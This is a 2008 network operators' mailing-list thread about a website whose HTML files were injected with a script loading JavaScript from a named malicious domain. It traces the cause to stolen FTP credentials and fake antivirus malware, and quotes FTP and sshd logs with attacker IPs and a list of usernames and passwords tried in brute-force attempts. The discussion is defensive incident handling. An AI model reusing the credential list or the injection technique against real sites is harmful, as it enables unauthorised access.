Hi, We have had only a single site compromised so far but googling around indicates that this particular hack is all over the place. On the site in question all files .htm, .html and .shtml have had code added before the </body> tag, the code is a <jscript></jscript> that loads fgg.js from http://www.usaadw.com, the script that is loaded then tries to open an iframe but the content gives a 500 server error. I can not identify the vector used to edit all the files. This is on a linux server running apache 2 but google finds plenty of .asp pages that have been attached as well. The script is also called ngg.js but has almost identical content. Has anyone else been hit and if so, has the vector been identified ? Any assistance appreciated. -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Glen and Rosanne Eustace GodZone Internet Services, a division of AGRE Enterprises Ltd. P.O. Box 8020, Palmerston North, New Zealand 4446. Ph: +64 6 357 8168, Fax +64 6 357 8165, Mob: +64 21 424 015 http://www.godzone.net.nz "A Ministry specialising in providing low-cost Internet Services to NZ Christian Churches, Ministries and Organisations."
Appears to have originated from SQL injections. http://infosec20.blogspot.com/2008/07/asprox-payload-morphed.html Kind regards, Truman On 13/07/2008, at 10:59 PM, Glen Eustace wrote:
Hi,
We have had only a single site compromised so far but googling around indicates that this particular hack is all over the place.
On the site in question all files .htm, .html and .shtml have had code added before the </body> tag, the code is a <jscript></jscript> that loads fgg.js from http://www.usaadw.com, the script that is loaded then tries to open an iframe but the content gives a 500 server error.
I can not identify the vector used to edit all the files. This is on a linux server running apache 2 but google finds plenty of .asp pages that have been attached as well. The script is also called ngg.js but has almost identical content.
Has anyone else been hit and if so, has the vector been identified ?
Any assistance appreciated.
-- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=- Glen and Rosanne Eustace GodZone Internet Services, a division of AGRE Enterprises Ltd. P.O. Box 8020, Palmerston North, New Zealand 4446. Ph: +64 6 357 8168, Fax +64 6 357 8165, Mob: +64 21 424 015 http://www.godzone.net.nz
"A Ministry specialising in providing low-cost Internet Services to NZ Christian Churches, Ministries and Organisations."
_______________________________________________ NZNOG mailing list NZNOG(a)list.waikato.ac.nz http://list.waikato.ac.nz/mailman/listinfo/nznog
OK, vector identified. The password for the site was cracked, then the site was downloaded, modified and then uploaded again. This happened concurrently from two sources. Sat Jul 12 18:37:19 2008 1 85.114.85.233 3711 /index_bak/index_js.shtml b _ o r xxxxx ftp 0 * c Sat Jul 12 18:37:23 2008 2 85.114.85.233 3761 /index_bak/index_js.shtml b _ i r xxxxx ftp 0 * c Sat Jul 12 18:37:27 2008 1 85.114.85.233 2693 /index_bak/try3.shtml b _ o r xxxxx ftp 0 * c Sat Jul 12 18:37:31 2008 2 85.114.85.233 2743 /index_bak/try3.shtml b _ i r xxxxx ftp 0 * c S Intermingled with this were records indicating the same behaviour from 116.71.41.118 So whilst earlier attacks have been via SQL injection, this is another vector to look for/be aware of. -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Glen and Rosanne Eustace GodZone Internet Services, a division of AGRE Enterprises Ltd. P.O. Box 8020, Palmerston North, New Zealand 4446. Ph: +64 6 357 8168, Fax +64 6 357 8165, Mob: +64 21 424 015 http://www.godzone.net.nz "A Ministry specialising in providing low-cost Internet Services to NZ Christian Churches, Ministries and Organisations."
On Mon, 14 Jul 2008 19:16:13 +1200 Glen Eustace <geustace(a)godzone.net.nz> wrote:
OK, vector identified.
The password for the site was cracked, then the site was downloaded, modified and then uploaded again. This happened concurrently from two sources.
My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end. Steve. -- Steve Holdoway <steve(a)greengecko.co.nz>
On 14/07/2008, at 9:44 PM, Steve Holdoway wrote:
On Mon, 14 Jul 2008 19:16:13 +1200 Glen Eustace <geustace(a)godzone.net.nz> wrote:
OK, vector identified.
The password for the site was cracked, then the site was downloaded, modified and then uploaded again. This happened concurrently from two sources.
My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end.
Secure FTP doesn't save people who have poorly chosen passwords, which I imagine is what happened in this case, and is in my opinion a much more likely to be exploited problem than unencrypted FTP. -- Nathan Ward
On Mon, 14 Jul 2008 21:59:30 +1200 Nathan Ward <nznog(a)daork.net> wrote:
On 14/07/2008, at 9:44 PM, Steve Holdoway wrote:
On Mon, 14 Jul 2008 19:16:13 +1200 Glen Eustace <geustace(a)godzone.net.nz> wrote:
OK, vector identified.
The password for the site was cracked, then the site was downloaded, modified and then uploaded again. This happened concurrently from two sources.
My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end.
Secure FTP doesn't save people who have poorly chosen passwords, which I imagine is what happened in this case, and is in my opinion a much more likely to be exploited problem than unencrypted FTP.
-- Nathan Ward
As it doesn't expose the account name either, it makes guessing the password infinitely more difficult. Also, by disabling ftp altogether, you've confused the script kiddies already. I suppose running sftp on port 21 would make them really mad! Just my opinion (: Steve -- Steve Holdoway <steve(a)greengecko.co.nz>
Nathan Ward wrote:
On 14/07/2008, at 9:44 PM, Steve Holdoway wrote:
On Mon, 14 Jul 2008 19:16:13 +1200 Glen Eustace <geustace(a)godzone.net.nz> wrote:
OK, vector identified.
The password for the site was cracked, then the site was downloaded, modified and then uploaded again. This happened concurrently from two sources. My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end.
Secure FTP doesn't save people who have poorly chosen passwords, which I imagine is what happened in this case, and is in my opinion a much more likely to be exploited problem than unencrypted FTP.
-- Nathan Ward
</lurk> I agree, slack passwords are a crackers delight :) <lurk>
Tom the Lurker wrote:
Nathan Ward wrote:
On 14/07/2008, at 9:44 PM, Steve Holdoway wrote:
My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end.
Secure FTP doesn't save people who have poorly chosen passwords, which I imagine is what happened in this case, and is in my opinion a much more likely to be exploited problem than unencrypted FTP.
I agree, slack passwords are a crackers delight :)
And if you're not watching/analyzing your logs, its very easy to miss someone trying passwords. I had a case where a customer's site had a backup DSL link, which wasn't really used. We got a cacti threshhold alert that said "DSL link using four times as much as last week!!!" (400 bytes/sec) Turned out that someone was trying all manner of usernames/passwords against an AS/400 running an FTP server. And it had been going on for hours. The usernames/passwords were anything from simple admin/root/ftpuser/jim/bob/mary through to obfusicated things like r00t/5up3ru53r/passw0rd/3TC... Who's going to notice an extra 400 bytes/sec on a busy link, other than by monitoring logs for denied requests? -- Criggie http://criggie.dyndns.org/
On Tue, 15 Jul 2008 08:02:34 +1200 Criggie <criggie(a)criggie.dyndns.org> wrote:
Tom the Lurker wrote:
Nathan Ward wrote:
On 14/07/2008, at 9:44 PM, Steve Holdoway wrote:
My pet hate is all these designers who just must have ftp access. Don't they realise that the ftp password is transferred in clear text over the internet? sftp is no big deal to set up either end.
Secure FTP doesn't save people who have poorly chosen passwords, which I imagine is what happened in this case, and is in my opinion a much more likely to be exploited problem than unencrypted FTP.
I agree, slack passwords are a crackers delight :)
And if you're not watching/analyzing your logs, its very easy to miss someone trying passwords.
I had a case where a customer's site had a backup DSL link, which wasn't really used. We got a cacti threshhold alert that said "DSL link using four times as much as last week!!!" (400 bytes/sec) Turned out that someone was trying all manner of usernames/passwords against an AS/400 running an FTP server. And it had been going on for hours. The usernames/passwords were anything from simple admin/root/ftpuser/jim/bob/mary through to obfusicated things like r00t/5up3ru53r/passw0rd/3TC...
Who's going to notice an extra 400 bytes/sec on a busy link, other than by monitoring logs for denied requests?
-- Criggie
I don't, but I run logcheck to *tell* me ( and fcheck to tell me of any file changes, and... )! tbh my production servers have a backdoor single account ssh access to the internet, which is protected by denyhosts, and all other access is from a staging server via vpn, still using secure ( but separate ) protocols. I don't care too much about the shortcomings of denyhosts, as a) it's protecting the emergency backup service, and b) I've got enough static ip addresses whitelisted to get in from - imo it's perfect for this job. OK, you *could* break in through a distributed attack on the ssh port, but the real risk to my servers is now human, from those with the relevant knowledge of the network configuration. But to me the chances of someone looking for a starting point 9000 miles from the server, breaking in, then going through a few other hoops before hacking across the vpn to the production server is remote enough to put a long way down my list. And, of course, I'm lucky enough not to have to support 1903 vintage IBM boat anchors (: Steve
On Tue, 15 Jul 2008 08:34:17 +1200 Steve Holdoway <steve(a)greengecko.co.nz> wrote:
I don't, but I run logcheck to *tell* me ( and fcheck to tell me of any file changes, and... )! tbh my production servers have a backdoor single account ssh access to the internet, which is protected by denyhosts, and all other access is from a staging server via vpn, still using secure ( but separate ) protocols. I don't care too much about the shortcomings of denyhosts, as a) it's protecting the emergency backup service, and b) I've got enough static ip addresses whitelisted to get in from - imo it's perfect for this job.
OK, you *could* break in through a distributed attack on the ssh port, but the real risk to my servers is now human, from those with the relevant knowledge of the network configuration. But to me the chances of someone looking for a starting point 9000 miles from the server, breaking in, then going through a few other hoops before hacking across the vpn to the production server is remote enough to put a long way down my list.
And, of course, I'm lucky enough not to have to support 1903 vintage IBM boat anchors (:
Steve
Just to follow this up from this morning...
From Logcheck... Jul 15 07:16:54 server sshd[8129]: Failed password for invalid user hipcomix from 207.210.107.2 port 34553 ssh2 Jul 15 07:16:54 server sshd[8132]: Failed password for root from 207.210.107.2 port 34566 ssh2 Jul 15 07:16:55 server sshd[8134]: Failed password for invalid user jpeger from 207.210.107.2 port 34582 ssh2 Jul 15 07:16:55 server sshd[8139]: Failed password for invalid user favs from 207.210.107.2 port 34606 ssh2 and a few more...
From Denyhosts... Date: Tue, 15 Jul 2008 07:17:00 +1200
Added the following hosts to /etc/hosts.deny: 207.210.107.2 (unknown) Steve
The plot thickens, as they say. There is no evidence of multiple attempts to get in via ftp. The userid was not something that would be easily guessed, can't comment on the password as I don't know what it was. The user and password would appear to have been obtained and used. From communications with the account holder, it would appear, though unconfirmed at this stage, that someone who had legitimate access to the site, *MAY* have done something they would prefer not to admit to. I am guessing a case of social engineering or similar. So in this case, the protocol used may be irrelevant. -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Glen and Rosanne Eustace GodZone Internet Services, a division of AGRE Enterprises Ltd. P.O. Box 8020, Palmerston North, New Zealand 4446. Ph: +64 6 357 8168, Fax +64 6 357 8165, Mob: +64 21 424 015 http://www.godzone.net.nz "A Ministry specialising in providing low-cost Internet Services to NZ Christian Churches, Ministries and Organisations."
I'd like to take a mo and thank Glen for being so open with the details of this recent event. I would suspect that this happens a whole lot more than any of us hear about and it's good to get cases out in the open. I loose count of the number of clients I talk to about security who come back and say "Oh that stuff never happens, it's all in the movies". It would be good if more people were aware of what the real danger/risk was. So thanks Glen! Well done!. Dean Glen Eustace wrote:
The plot thickens, as they say.
There is no evidence of multiple attempts to get in via ftp. The userid was not something that would be easily guessed, can't comment on the password as I don't know what it was.
The user and password would appear to have been obtained and used.
From communications with the account holder, it would appear, though unconfirmed at this stage, that someone who had legitimate access to the site, *MAY* have done something they would prefer not to admit to.
I am guessing a case of social engineering or similar. So in this case, the protocol used may be irrelevant.
From communications with the account holder, it would appear, though unconfirmed at this stage, that someone who had legitimate access to the site, *MAY* have done something they would prefer not to admit to.
Whilst still unable to say 100%, the timing etc and what I have found ( which admittedly isn't much ) about the malware concerned, it would seem that the unfortunate individual had a run in with VirusRemover 2008. He is now $155.00 worse off and a few of us have had a cleanup to complete. -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Glen and Rosanne Eustace GodZone Internet Services, a division of AGRE Enterprises Ltd. P.O. Box 8020, Palmerston North, New Zealand 4446. Ph: +64 6 357 8168, Fax +64 6 357 8165, Mob: +64 21 424 015 http://www.godzone.net.nz "A Ministry specialising in providing low-cost Internet Services to NZ Christian Churches, Ministries and Organisations."
participants (7)
-
Criggie -
Dean Pemberton -
Glen Eustace -
Nathan Ward -
Steve Holdoway -
Tom -
Truman Boyes